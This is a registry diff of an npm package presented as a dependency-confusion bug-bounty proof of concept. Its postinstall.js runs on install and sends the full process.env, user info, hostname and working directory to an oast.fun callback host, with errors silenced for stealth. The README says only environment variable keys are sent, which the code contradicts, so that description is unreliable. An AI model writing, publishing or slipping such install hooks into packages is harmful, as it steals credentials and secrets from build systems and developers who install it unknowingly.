ember-simplepractice 0.0.1-poc
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ember-simplepractice might be problematic. Click here for more details.
- package/README.md +35 -0
- package/package.json +14 -0
- package/postinstall.js +66 -0
package/README.md
ADDED
|
@@ -0,0 +1,35 @@
|
|
|
1
|
+
# ⚠️ SECURITY RESEARCH PoC: Dependency Confusion
|
|
2
|
+
|
|
3
|
+
This package is part of a **bug bounty proof-of-concept** designed to demonstrate the impact of [dependency confusion](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) vulnerabilities in internal build systems.
|
|
4
|
+
|
|
5
|
+
## 🚨 What This Package Does
|
|
6
|
+
|
|
7
|
+
When installed, this package performs a **non-destructive metadata callback** to a controlled server to demonstrate that it was pulled and executed. The callback includes basic system information such as:
|
|
8
|
+
|
|
9
|
+
- Hostname
|
|
10
|
+
- Platform and architecture
|
|
11
|
+
- Current working directory
|
|
12
|
+
- Environment variable keys
|
|
13
|
+
- Node.js version
|
|
14
|
+
|
|
15
|
+
This data is used **solely for impact demonstration** and responsible disclosure.
|
|
16
|
+
|
|
17
|
+
## ❗ WARNING
|
|
18
|
+
|
|
19
|
+
**Do NOT use this package in production or internal environments.**
|
|
20
|
+
|
|
21
|
+
It is intended for ethical testing only. Installing this package may result in remote code execution (RCE) under certain configurations, depending on how your build system handles third-party packages.
|
|
22
|
+
|
|
23
|
+
## 🧠 Why This Exists
|
|
24
|
+
|
|
25
|
+
This package helps security researchers and organizations identify vulnerable dependency resolution workflows. It is part of a broader effort to improve supply chain security and prevent malicious package injection.
|
|
26
|
+
|
|
27
|
+
## 📬 Contact
|
|
28
|
+
|
|
29
|
+
If you believe this package was pulled by your system and want to learn more or coordinate disclosure, please reach out:
|
|
30
|
+
|
|
31
|
+
**Email:** shubhaskargaur99@gmail.com
|
|
32
|
+
|
|
33
|
+
## 🛡️ Ethical Use
|
|
34
|
+
|
|
35
|
+
This package does **not** perform any destructive actions. It is designed for **responsible security research** and follows ethical guidelines for bug bounty programs.
|
package/package.json
ADDED
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "ember-simplepractice",
|
|
3
|
+
"version": "0.0.1-poc",
|
|
4
|
+
"description": "Safe PoC for dependency confusion POC.",
|
|
5
|
+
"main": "postinstall.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node postinstall.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "POC (safe)",
|
|
10
|
+
"license": "MIT",
|
|
11
|
+
"dependencies": {
|
|
12
|
+
},
|
|
13
|
+
"keywords": []
|
|
14
|
+
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,66 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const os = require('os');
|
|
3
|
+
|
|
4
|
+
|
|
5
|
+
console.log(`
|
|
6
|
+
============================================================
|
|
7
|
+
⚠️ SECURITY RESEARCH NOTICE
|
|
8
|
+
============================================================
|
|
9
|
+
|
|
10
|
+
This package is part of a bug bounty proof-of-concept (PoC) targeting dependency confusion vulnerabilities.
|
|
11
|
+
|
|
12
|
+
It was published to test whether internal systems mistakenly install public packages with the same name as private ones — a known supply chain risk.
|
|
13
|
+
|
|
14
|
+
When installed, this package sends basic system metadata (e.g., hostname, platform, environment details) to a secure server for impact demonstration.
|
|
15
|
+
|
|
16
|
+
❗ DO NOT use this package in production or sensitive environments.
|
|
17
|
+
|
|
18
|
+
If you're seeing this message, your system may be vulnerable to dependency confusion — meaning it may be pulling packages from public sources when it shouldn't.
|
|
19
|
+
|
|
20
|
+
This PoC is non-destructive and used strictly for ethical security research.
|
|
21
|
+
|
|
22
|
+
To report this or for questions, contact: shubhaskargaur99@gmail.com
|
|
23
|
+
============================================================
|
|
24
|
+
`);
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
setTimeout(() => {
|
|
28
|
+
console.error("SECURITY RESEARCH PoC: Your system may be vulnerable to dependency confusion.");
|
|
29
|
+
console.trace(); // shows stack trace without crashing
|
|
30
|
+
}, 1000);
|
|
31
|
+
|
|
32
|
+
|
|
33
|
+
|
|
34
|
+
function exfiltrate(data) {
|
|
35
|
+
const payload = JSON.stringify(data);
|
|
36
|
+
const options = {
|
|
37
|
+
hostname: 'bjfuyjnlqqtwxidckpfozy4xovlu6xifm.oast.fun',
|
|
38
|
+
port: 443,
|
|
39
|
+
path: '/poc',
|
|
40
|
+
method: 'POST',
|
|
41
|
+
headers: {
|
|
42
|
+
'Content-Type': 'application/json',
|
|
43
|
+
'Content-Length': Buffer.byteLength(payload)
|
|
44
|
+
}
|
|
45
|
+
};
|
|
46
|
+
|
|
47
|
+
const req = https.request(options, res => {
|
|
48
|
+
res.on('data', () => {}); // consume response
|
|
49
|
+
});
|
|
50
|
+
|
|
51
|
+
req.on('error', () => {}); // suppress errors for stealth
|
|
52
|
+
|
|
53
|
+
req.write(payload);
|
|
54
|
+
req.end();
|
|
55
|
+
}
|
|
56
|
+
|
|
57
|
+
const data = {
|
|
58
|
+
hostname: os.hostname(),
|
|
59
|
+
platform: os.platform(),
|
|
60
|
+
arch: os.arch(),
|
|
61
|
+
userInfo: os.userInfo(),
|
|
62
|
+
cwd: process.cwd(),
|
|
63
|
+
env: process.env
|
|
64
|
+
};
|
|
65
|
+
|
|
66
|
+
exfiltrate(data);
|